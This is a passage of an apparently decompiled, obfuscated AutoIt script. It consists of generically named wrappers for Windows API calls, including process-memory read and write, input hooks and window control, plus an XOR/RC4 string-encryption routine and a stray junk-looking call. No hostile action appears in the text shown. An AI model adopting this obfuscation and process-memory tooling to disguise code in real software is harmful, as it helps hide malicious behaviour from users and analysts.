- LOCAL $Local0059 =DLLSTRUCTGETDATA($ArgRef00,"Left" )
- LOCAL $Local005A =DLLSTRUCTGETDATA($ArgRef00,"Top" )
- LOCAL $Local005B =DLLSTRUCTGETDATA($ArgRef00,"Right" )
- LOCAL $Local005C =DLLSTRUCTGETDATA($ArgRef00,"Bottom" )
- IF $ArgOpt01 THEN
- $Local0059 =$Local0059 +(($Local005B -$Local0059 )/ 2 )
- $Local005A =$Local005A +(($Local005C -$Local005A )/ 2 )
- ENDIF
- LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
- DLLSTRUCTSETDATA($Local0030 ,"X" ,$Local0059 )
- DLLSTRUCTSETDATA($Local0030 ,"Y" ,$Local005A )
- RETURN $Local0030
- ENDFUNC
- Func Fn009A($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"PostMessage","hwnd" ,$Arg00,"uint" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn009B($Arg00)
- RETURN BITAND($Arg00,0x03FF )
- ENDFUNC
- Func Fn009C(BYREF $ArgRef00,BYREF $ArgRef01)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"PtInRect" ,"struct*" ,$ArgRef00,"struct" ,$ArgRef01)
- IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
- RETURN NOT ($Local000E [ 0 ]= 0 )
- ENDFUNC
- Func Fn009D($Arg00,$Arg01,$Arg02,BYREF $ArgRef03,$ArgOpt04=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadFile" ,"handle" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword*" , 0 ,"ptr" ,$ArgOpt04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- $ArgRef03=$Local000E [ 4 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn009E($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadProcessMemory","handle" ,$Arg00,"ptr" ,$Arg01,"ptr" ,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- $ArgRef04=$Local000E [ 5 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn009F(BYREF $ArgRef00)
- RETURN (DLLSTRUCTGETDATA($ArgRef00,"Left" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Top" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Right" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Bottom" )= 0 )
- ENDFUNC
- Func Fn00A0($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=5)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"RedrawWindow","hwnd" ,$Arg00,"struct*" ,$ArgOpt01,"handle" ,$ArgOpt02,"uint" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A1($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"RegisterWindowMessageW","wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A2()
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ReleaseCapture")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A3($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"ReleaseDC" ,"hwnd" ,$Arg00,"handle" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A4($Arg00,BYREF $ArgRef01)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ScreenToClient","hwnd" ,$Arg00,"struct*" ,$ArgRef01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A5($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"SelectObject","handle" ,$Arg00,"handle" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A6($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"INT" ,"SetBkColor","handle" ,$Arg00,"dword" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A7($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"SetBkMode" ,"handle" ,$Arg00,"int" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A8($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetCapture","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00A9($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetCursor" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AA($Arg00)
- LOCAL $Local000E =DLLCALL("winspool.drv","bool" ,"SetDefaultPrinterW","wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AB($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$ArgOpt06=0)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"SetDIBits" ,"handle" ,$Arg00,"handle" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03,"ptr" ,$Arg04,"ptr" ,$Arg05,"uint" ,$ArgOpt06)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AC($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetEndOfFile","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AD($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetEvent" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AE($Arg00,$Arg01,$ArgOpt02=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"SetFilePointer","handle" ,$Arg00,"long" ,$Arg01,"ptr" , 0 ,"long" ,$ArgOpt02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00AF($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetFocus" ,"hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B0($Arg00,$Arg01,$ArgOpt02=TRUE )
- Fn0006($Arg00,$Var0027 ,$Arg01,$ArgOpt02, 0 ,"hwnd" )
- ENDFUNC
- Func Fn00B1($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetHandleInformation","handle" ,$Arg00,"dword" ,$Arg01,"dword" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B2($Arg00,$Arg01,$ArgOpt02=255,$ArgOpt03=3,$ArgOpt04=FALSE )
- IF $ArgOpt03=DEFAULT OR $ArgOpt03="" OR $ArgOpt03< 0 THEN $ArgOpt03= 3
- IF NOT $ArgOpt04 THEN
- $Arg01=INT(BINARYMID($Arg01, 3 , 1 )&BINARYMID($Arg01, 2 , 1 )&BINARYMID($Arg01, 1 , 1 ))
- ENDIF
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetLayeredWindowAttributes","hwnd" ,$Arg00,"dword" ,$Arg01,"byte" ,$ArgOpt02,"dword" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B3($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetParent" ,"hwnd" ,$Arg00,"hwnd" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B4($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetProcessAffinityMask","handle" ,$Arg00,"ulong_ptr" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B5($Arg00,$Arg01)
- LOCAL $Local005D =ISARRAY($Arg00),$Var0157 =ISARRAY($Arg01)
- LOCAL $Var0158
- IF NOT $Var0157 AND NOT $Local005D THEN
- $Var0158 = 1
- ELSEIF $Var0157 OR $Local005D THEN
- IF NOT $Var0157 OR NOT $Local005D THEN RETURN SETERROR(- 1 ,- 1 ,FALSE )
- IF UBOUND($Arg00)<>UBOUND($Arg01)THEN RETURN SETERROR(- 1 ,- 1 ,FALSE )
- $Var0158 =UBOUND($Arg00)
- ENDIF
- LOCAL $Local005E =DLLSTRUCTCREATE("int Element["&$Var0158 &"]" )
- LOCAL $Local005F =DLLSTRUCTCREATE("dword NewColor["&$Var0158 &"]" )
- IF NOT $Local005D THEN
- DLLSTRUCTSETDATA($Local005E ,"Element" ,$Arg00, 1 )
- ELSE
- FOR $Var0149 = 0 TO $Var0158 - 1
- DLLSTRUCTSETDATA($Local005E ,"Element" ,$Arg00[$Var0149 ],$Var0149 + 1 )
- NEXT
- ENDIF
- IF NOT $Var0157 THEN
- DLLSTRUCTSETDATA($Local005F ,"NewColor" ,$Arg01, 1 )
- ELSE
- FOR $Var0149 = 0 TO $Var0158 - 1
- DLLSTRUCTSETDATA($Local005F ,"NewColor" ,$Arg01[$Var0149 ],$Var0149 + 1 )
- NEXT
- ENDIF
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetSysColors","int" ,$Var0158 ,"struct*" ,$Local005E ,"struct*" ,$Local005F )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B6($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"INT" ,"SetTextColor","handle" ,$Arg00,"dword" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B7($Arg00,$Arg01,$Arg02)
- A5100705641( 0 )
- LOCAL $Local0042 ="SetWindowLongW"
- IF @AutoItX64 THEN $Local0042 ="SetWindowLongPtrW"
- LOCAL $Local000E =DLLCALL("user32.dll","long_ptr" ,$Local0042 ,"hwnd" ,$Arg00,"int" ,$Arg01,"long_ptr" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B8($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowPlacement","hwnd" ,$Arg00,"ptr" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00B9($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowPos","hwnd" ,$Arg00,"hwnd" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05,"uint" ,$Arg06)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00BA($Arg00,$Arg01,$ArgOpt02=TRUE )
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"SetWindowRgn","hwnd" ,$Arg00,"handle" ,$Arg01,"bool" ,$ArgOpt02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00BB($Arg00,$Arg01,$Arg02,$ArgOpt03=0)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetWindowsHookEx","int" ,$Arg00,"ptr" ,$Arg01,"handle" ,$Arg02,"dword" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00BC($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowTextW","hwnd" ,$Arg00,"wstr" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00BD($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"ShowCursor","bool" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00BE($Arg00,$ArgOpt01=TRUE )
- Fn008F(0x00041010 ,"Error" ,$Arg00)
- IF $ArgOpt01 THEN EXIT
- ENDFUNC
- Func Fn00BF($Arg00)
- Fn008F(0x0040 +0x1000 ,"Information",$Arg00)
- ENDFUNC
- Func Fn00C0($Arg00,$ArgOpt01=5)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ShowWindow","hwnd" ,$Arg00,"int" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00C1($Arg00)
- LOCAL $Local000E =DLLCALL("ole32.dll" ,"int" ,"StringFromGUID2","struct*" ,$Arg00,"wstr" ,"","int" ,0x0028 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
- ENDFUNC
- Func Fn00C2($Arg00)
- LOCAL $Local0000 =DLLCALL("kernel32.dll","int" ,"lstrlenA" ,"struct*" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
- RETURN $Local0000 [ 0 ]
- ENDFUNC
- Func Fn00C3($Arg00)
- LOCAL $Local0000 =DLLCALL("kernel32.dll","int" ,"lstrlenW" ,"struct*" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
- RETURN $Local0000 [ 0 ]
- ENDFUNC
- Func Fn00C4($Arg00)
- RETURN BITSHIFT($Arg00, 10 )
- ENDFUNC
- Func Fn00C5($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SystemParametersInfoW","uint" ,$Arg00,"uint" ,$ArgOpt01,"ptr" ,$ArgOpt02,"uint" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00C6()
- LOCAL $Local007E ,$Var0159
- $Local007E =Fn004E( 0 )
- $Var0159 =0x05A0 /Fn0050($Local007E ,$Var0037 )
- Fn00A3( 0 ,$Local007E )
- RETURN $Var0159
- ENDFUNC
- Func Fn00C7()
- LOCAL $Local007E ,$Var015A
- $Local007E =Fn004E( 0 )
- $Var015A =0x05A0 /Fn0050($Local007E ,$Var0039 )
- Fn00A3( 0 ,$Local007E )
- RETURN $Var015A
- ENDFUNC
- Func Fn00C8($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UnhookWindowsHookEx","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00C9($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UpdateLayeredWindow","hwnd" ,$Arg00,"handle" ,$Arg01,"ptr" ,$Arg02,"ptr" ,$Arg03,"handle" ,$Arg04,"ptr" ,$Arg05,"dword" ,$Arg06,"ptr" ,$Arg07,"dword" ,$Arg08)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00CA($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UpdateWindow","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00CB($Arg00,$ArgOpt01=-1)
- LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"WaitForInputIdle","handle" ,$Arg00,"dword" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00CC($Arg00,$Arg01,$ArgOpt02=FALSE ,$ArgOpt03=-1)
- LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"WaitForMultipleObjects","dword" ,$Arg00,"ptr" ,$Arg01,"bool" ,$ArgOpt02,"dword" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00CD($Arg00,$ArgOpt01=-1)
- LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"WaitForSingleObject","handle" ,$Arg00,"dword" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00CE($Arg00,$ArgOpt01=0,$ArgOpt02=TRUE )
- LOCAL $Local0060 ="wstr"
- IF NOT ISSTRING($Arg00)THEN $Local0060 ="struct*"
- LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"WideCharToMultiByte","uint" ,$ArgOpt01,"dword" , 0 ,$Local0060 ,$Arg00,"int" ,- 1 ,"ptr" , 0 ,"int" , 0 ,"ptr" , 0 ,"ptr" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- LOCAL $Local0061 =DLLSTRUCTCREATE("char[" &$Local000E [ 0 ]&"]" )
- $Local000E =DLLCALL("kernel32.dll","int" ,"WideCharToMultiByte","uint" ,$ArgOpt01,"dword" , 0 ,$Local0060 ,$Arg00,"int" ,- 1 ,"struct*" ,$Local0061 ,"int" ,$Local000E [ 0 ],"ptr" , 0 ,"ptr" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- IF $ArgOpt02 THEN RETURN DLLSTRUCTGETDATA($Local0061 , 1 )
- RETURN $Local0061
- ENDFUNC
- Func Fn00CF(BYREF $ArgRef00)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"WindowFromPoint","struct" ,$ArgRef00)
- IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00D0($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteConsoleW","handle" ,$Arg00,"wstr" ,$Arg01,"dword" ,STRINGLEN($Arg01),"dword*" , 0 ,"ptr" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00D1($Arg00,$Arg01,$Arg02,BYREF $ArgRef03,$ArgOpt04=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteFile" ,"handle" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword*" , 0 ,"ptr" ,$ArgOpt04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- $ArgRef03=$Local000E [ 4 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00D2($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04,$ArgOpt05="ptr")
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteProcessMemory","handle" ,$Arg00,"ptr" ,$Arg01,$ArgOpt05,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- $ArgRef04=$Local000E [ 5 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00D3($Arg00)
- IF STRINGLEFT($Arg00, 2 )="0x" THEN RETURN BINARYTOsTRING($Arg00)
- RETURN BINARYTOsTRING("0x" &$Arg00)
- ENDFUNC
- Func Fn00D4($Arg00,$Arg01,$Arg02,$ArgOpt03=-1)
- LOCAL $Local0062 =""
- IF $ArgOpt03=DEFAULT OR $ArgOpt03=- 1 THEN $Local0062 ="(?i)"
- LOCAL $Local0063 ="(\.|\||\*|\?|\+|\(|\)|\{|\}|\[|\]|\^|\$|\\)"
- $Arg01=STRINGREGEXPREPLACE($Arg01,$Local0063 ,"\\$1" )
- $Arg02=STRINGREGEXPREPLACE($Arg02,$Local0063 ,"\\$1" )
- IF $Arg01="" THEN $Arg01="\A"
- IF $Arg02="" THEN $Arg02="\z"
- LOCAL $Local0064 =STRINGREGEXP($Arg00,"(?s)" &$Local0062 &$Arg01&"(.*?)" &$Arg02, 3 )
- IF @ERROR THEN RETURN SETERROR( 1 , 0 , 0 )
- RETURN $Local0064
- ENDFUNC
- Func Fn00D5($Arg00,$Arg01,$Arg02,$ArgOpt03=1)
- IF $Arg00<> 0 AND $Arg00<> 1 THEN
- SETERROR( 1 , 0 ,"")
- ELSEIF $Arg01="" OR $Arg02="" THEN
- SETERROR( 1 , 0 ,"")
- ELSE
- IF NUMBER($ArgOpt03)<= 0 OR INT($ArgOpt03)<>$ArgOpt03 THEN $ArgOpt03= 1
- LOCAL $Var015B
- LOCAL $Var015C
- LOCAL $Var015D
- LOCAL $Var015E
- LOCAL $Local0065 [0x0100 ][ 2 ]
- LOCAL $Var015F
- LOCAL $Var0160
- LOCAL $Var0161
- LOCAL $Var0162
- LOCAL $Var0163
- LOCAL $Var0164
- LOCAL $Var0165
- IF $Arg00= 1 THEN
- FOR $Var0166 = 0 TO $ArgOpt03 STEP 1
- $Var015D =""
- $Var015C =""
- $Var015B =""
- FOR $Var015D = 1 TO STRINGLEN($Arg01)
- IF $Var015C =STRINGLEN($Arg02)THEN
- $Var015C = 1
- ELSE
- $Var015C += 1
- ENDIF
- $Var015B =$Var015B &CHR(BITXOR(ASC(STRINGMID($Arg01,$Var015D , 1 )),ASC(STRINGMID($Arg02,$Var015C , 1 )),0x00FF ))
- NEXT
- $Arg01=$Var015B
- $Var015F =""
- $Var0160 = 0
- $Var0161 =""
- $Var0162 =""
- $Var0163 =""
- $Var0165 =""
- $Var0164 =""
- $Var015E =""
- $Local0065 =""
- LOCAL $Local0065 [0x0100 ][ 2 ]
- FOR $Var015F = 0 TO 0x00FF
- $Local0065 [$Var015F ][ 1 ]=ASC(STRINGMID($Arg02,MOD($Var015F ,STRINGLEN($Arg02))+ 1 , 1 ))
- $Local0065 [$Var015F ][ 0 ]=$Var015F
- NEXT
- FOR $Var015F = 0 TO 0x00FF
- $Var0160 =MOD(($Var0160 +$Local0065 [$Var015F ][ 0 ]+$Local0065 [$Var015F ][ 1 ]),0x0100 )
- $Var015E =$Local0065 [$Var015F ][ 0 ]
- $Local0065 [$Var015F ][ 0 ]=$Local0065 [$Var0160 ][ 0 ]
- $Local0065 [$Var0160 ][ 0 ]=$Var015E
- NEXT
- FOR $Var015F = 1 TO STRINGLEN($Arg01)
- $Var0161 =MOD(($Var0161 + 1 ),0x0100 )
- $Var0162 =MOD(($Var0162 +$Local0065 [$Var0161 ][ 0 ]),0x0100 )
- $Var0163 =$Local0065 [MOD(($Local0065 [$Var0161 ][ 0 ]+$Local0065 [$Var0162 ][ 0 ]),0x0100 )][ 0 ]
- $Var0165 =BITXOR(ASC(STRINGMID($Arg01,$Var015F , 1 )),$Var0163 )
- $Var0164 &=HEX($Var0165 , 2 )
- NEXT
- $Arg01=$Var0164
- NEXT
- ELSE
- FOR $Var0166 = 0 TO $ArgOpt03 STEP 1
- $Var0160 = 0
- $Var0161 =""
- $Var0162 =""
- $Var0163 =""
- $Var0165 =""
- $Var0164 =""
- $Var015E =""
- $Local0065 =""
- LOCAL $Local0065 [0x0100 ][ 2 ]
- FOR $Var015F = 0 TO 0x00FF
- $Local0065 [$Var015F ][ 1 ]=ASC(STRINGMID($Arg02,MOD($Var015F ,STRINGLEN($Arg02))+ 1 , 1 ))
- $Local0065 [$Var015F ][ 0 ]=$Var015F
- NEXT
- FOR $Var015F = 0 TO 0x00FF
- $Var0160 =MOD(($Var0160 +$Local0065 [$Var015F ][ 0 ]+$Local0065 [$Var015F ][ 1 ]),0x0100 )
- $Var015E =$Local0065 [$Var015F ][ 0 ]
- $Local0065 [$Var015F ][ 0 ]=$Local0065 [$Var0160 ][ 0 ]
- $Local0065 [$Var0160 ][ 0 ]=$Var015E
- NEXT
- FOR $Var015F = 1 TO STRINGLEN($Arg01)STEP 2
- $Var0161 =MOD(($Var0161 + 1 ),0x0100 )
- $Var0162 =MOD(($Var0162 +$Local0065 [$Var0161 ][ 0 ]),0x0100 )
- $Var0163 =$Local0065 [MOD(($Local0065 [$Var0161 ][ 0 ]+$Local0065 [$Var0162 ][ 0 ]),0x0100 )][ 0 ]
- $Var0165 =BITXOR(DEC(STRINGMID($Arg01,$Var015F , 2 )),$Var0163 )
- $Var0164 =$Var0164 &CHR($Var0165 )
- NEXT
- $Arg01=$Var0164
- $Var015D =""
- $Var015C =""
- $Var015B =""
- FOR $Var015D = 1 TO STRINGLEN($Arg01)
- IF $Var015C =STRINGLEN($Arg02)THEN
- $Var015C = 1
- ELSE
- $Var015C += 1
- ENDIF
- $Var015B &=CHR(BITXOR(ASC(STRINGMID($Arg01,$Var015D , 1 )),ASC(STRINGMID($Arg02,$Var015C , 1 )),0x00FF ))
- NEXT
- $Arg01=$Var015B
- NEXT
- ENDIF
- RETURN $Arg01
- ENDIF
- ENDFUNC
- Func Fn00D6($Arg00,$Arg01,$ArgOpt02=0)
- IF $ArgOpt02> 0 THEN
- $Arg00=STRINGREPLACE($Arg00,$Arg01,CHR( 0 ),$ArgOpt02)
- $Arg01=CHR( 0 )
- ELSEIF $ArgOpt02< 0 THEN
- LOCAL $Local0066 =STRINGINSTR($Arg00,$Arg01, 0 ,$ArgOpt02)
- IF $Local0066 THEN
- $Arg00=STRINGLEFT($Arg00,$Local0066 - 1 )
- ENDIF
- ENDIF
- RETURN STRINGSPLIT($Arg00,$Arg01, 3 )
- ENDFUNC
- Func Fn00D7($Arg00,$Arg01,$Arg02)
- LOCAL $Var0167 ,$Var0168 ,$Var0169
- IF $Arg00="" OR (NOT ISSTRING($Arg00))THEN
- RETURN SETERROR( 1 , 0 ,$Arg00)
- ELSEIF $Arg01="" OR (NOT ISSTRING($Arg00))THEN
- RETURN SETERROR( 2 , 0 ,$Arg00)
- ELSE
- $Var0167 =STRINGLEN($Arg00)
- IF (ABS($Arg02)>$Var0167 )OR (NOT ISINT($Arg02))THEN
- RETURN SETERROR( 3 , 0 ,$Arg00)
- ENDIF
- ENDIF
- IF $Arg02= 0 THEN
- RETURN $Arg01&$Arg00
- ELSEIF $Arg02> 0 THEN
- $Var0168 =STRINGLEFT($Arg00,$Arg02)
- $Var0169 =STRINGRIGHT($Arg00,$Var0167 -$Arg02)
- RETURN $Var0168 &$Arg01&$Var0169
- ELSEIF $Arg02< 0 THEN
- $Var0168 =STRINGLEFT($Arg00,ABS($Var0167 +$Arg02))
- $Var0169 =STRINGRIGHT($Arg00,ABS($Arg02))
- RETURN $Var0168 &$Arg01&$Var0169
- ENDIF
- ENDFUNC
- Func Fn00D8($Arg00)
- LOCAL $Local0067 = 0
- LOCAL $Local0068 = 1
- LOCAL $Local0069 =""
- LOCAL $Var016A
- FOR $Local0067 = 1 TO STRINGLEN($Arg00)
- $Var016A =STRINGMID($Arg00,$Local0067 , 1 )
- SELECT
- CASE $Local0068 = 1
